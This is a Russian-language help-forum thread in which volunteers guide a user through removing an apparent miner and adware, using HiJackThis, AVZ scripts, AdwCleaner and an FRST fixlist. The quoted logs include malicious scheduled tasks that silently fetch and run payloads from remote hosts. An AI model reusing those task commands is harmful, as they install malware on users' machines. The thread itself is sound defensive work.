Перейти к содержанию

svchost.exe 50% нагрузка на ЦП


Рекомендуемые сообщения

Илья Болдырев

Я уже не знаю, что делать. Пытаюсь забить в поисковике браузера какую нибудь программу, чтобы увидеть за что отвечает процесс svchost с ID 7500, но браузер тут же закрывается. Раньше с такими вирусами не сталкивался. Скорее всего, майнер. Прошу помочь. При запуске AutoLogger, появляется окошко и сразу закрывается. Никаких логов в папке нет.

Изменено пользователем Илья Болдырев
Ссылка на сообщение
Поделиться на другие сайты
Илья Болдырев

Пробовали в безопасном режиме запустить автологгер?

Запустил каждую утилиту по отдельности и собрал их логи в один архив. Однако, когда пытаюсь открыть папку с AVZ, рабочий стол начинает мигать и вся папка со Сборщиком закрывается. И так каждый раз.

Пробовали в безопасном режиме запустить автологгер?

Также иногда открывается вкладка в браузере с рекламой казино...

Пробовали в безопасном режиме запустить автологгер?

Прошу прощения, надо было сразу в безопасном запускать. Вот архив с логами.

CollectionLog-2018.06.04-06.43.zip

Изменено пользователем Илья Болдырев
Ссылка на сообщение
Поделиться на другие сайты

Удалите Iobit через установку программ в панели упраления.

 

HiJackThis (из каталога autologger)профиксить

O9-32 - Button: HKLM\..\{e6be8e97-9343-42bd-9cfd-9e2e74db25d8} - (no name) - (no file)
O22 - Task: {59BF0B3A-D522-31FD-B4AF-52E1E6590D00} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://net2018.net/cl/?guid=o8r4g5otkyt3sbegs4g5e9vnpdh2ew2s&prid=1&pid=4_1009_0
O22 - Task: {C1A23778-BEE6-FD6A-6AC2-C3F497CF0758} - C:\WINDOWS\Yyye.exe /q /i http://secproof.net/6d37l5swnpoq.xyo
O22 - Task: {CDD5D8F9-A723-8352-C439-739EEBB1594D} - C:\Users\ilyad\AppData\Roaming\EELC.exe /q /i http://secproof.net/kynlkbkzzble.ajb
AVZ выполнить следующий скрипт.

Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','');
 QuarantineFile('C:\WINDOWS\Yyye.exe','');
 DeleteFile('C:\WINDOWS\Yyye.exe','64');
 DeleteFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','64');
 ExecuteFile('schtasks.exe', '/delete /TN "{C1A23778-BEE6-FD6A-6AC2-C3F497CF0758}" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "{CDD5D8F9-A723-8352-C439-739EEBB1594D}" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "{59BF0B3A-D522-31FD-B4AF-52E1E6590D00}" /F', 0, 15000, true); 
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteRepair(9);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

 

После перезагрузки:

- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.
quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.

1. В заголовке письма напишите "Запрос на исследование вредоносного файла".

2. В письме напишите "Выполняется запрос хэлпера".

3. Прикрепите файл карантина и нажмите "Отправить"

4. Полученный ответ сообщите здесь (с указанием номера KLAN)

 

- Подготовьте лог AdwCleaner и приложите его в теме.

Ссылка на сообщение
Поделиться на другие сайты
Илья Болдырев

Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".

Ссылка на сообщение
Поделиться на другие сайты

Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".

выполните в безопасном режиме

Ссылка на сообщение
Поделиться на другие сайты
Илья Болдырев

Выполнил все скрипты в AVZ. Однако, архив quarantine оказался пустой. Так должно быть? Выполнил сканирование через AdwCleaner. Вот логи.

AdwCleanerS00.txt

Ссылка на сообщение
Поделиться на другие сайты

возможно указанных файлов уже нет.

 

Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Ссылка на сообщение
Поделиться на другие сайты

- Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".

    B92LqRQ.png

  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Ссылка на сообщение
Поделиться на другие сайты

Не используете больше одного антивируса в системе (Avast, Eset), удалите один из них. Иначе возможно проблемы с совместимостью.

  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

    CreateRestorePoint:
    CloseProcesses:
    CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    OPR Extension: (Tampermonkey) - C:\Users\ilyad\AppData\Roaming\Opera Software\Opera Stable\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2018-06-03]
    File: C:\WINDOWS\SysWOW64\Drivers\vduwodk5.sys
    File: C:\WINDOWS\system32\tcbres.wim
    File: C:\WINDOWS\system32\srms-apr.dat
    File: C:\WINDOWS\SysWOW64\srms-apr.dat
    2018-06-04 07:40 - 2017-12-21 17:04 - 000000000 ____D C:\Users\ilyad\AppData\LocalLow\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\Все пользователи\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\ilyad\AppData\Roaming\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\ProgramData\IObit
    2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Program Files (x86)\IObit
    Folder: C:\Users\ilyad\3D Objects
    File: C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe
    2018-04-12 03:34 - 2018-04-12 03:34 - 000178688 ____N (Microsoft Corporation) C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe
    File: C:\Users\ilyad\AppData\Local\WMI.ini
    AlternateDataStreams: C:\Users\Public\AppData:CSM [480]
    FirewallRules: [{1D21456D-6EBF-40BB-AF76-E0C82A419C40}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe
    FirewallRules: [{094B40ED-C0C4-49C2-A070-1BE203FEE6E8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe
    FirewallRules: [{5E53A729-41A2-49A0-BA8E-4FED1E3EE49F}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe
    FirewallRules: [{3647FA04-A65E-421C-B5A0-2DE9B8D359E1}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe
    FirewallRules: [{3ACDFBAC-E5DD-4008-A882-35BB847799ED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe
    FirewallRules: [{87EA0775-1AF5-4E16-B3F7-7D41DED2F8A7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe
    Reboot:
    
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на сообщение
Поделиться на другие сайты
Илья Болдырев

Лог-файл


Пользуюсь на данный момент только одним антивирусом (Avast), возможно, остались какие то файлы от ESET, так как раньше пользовался им.

Fixlog.txt

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
×
  • Создать...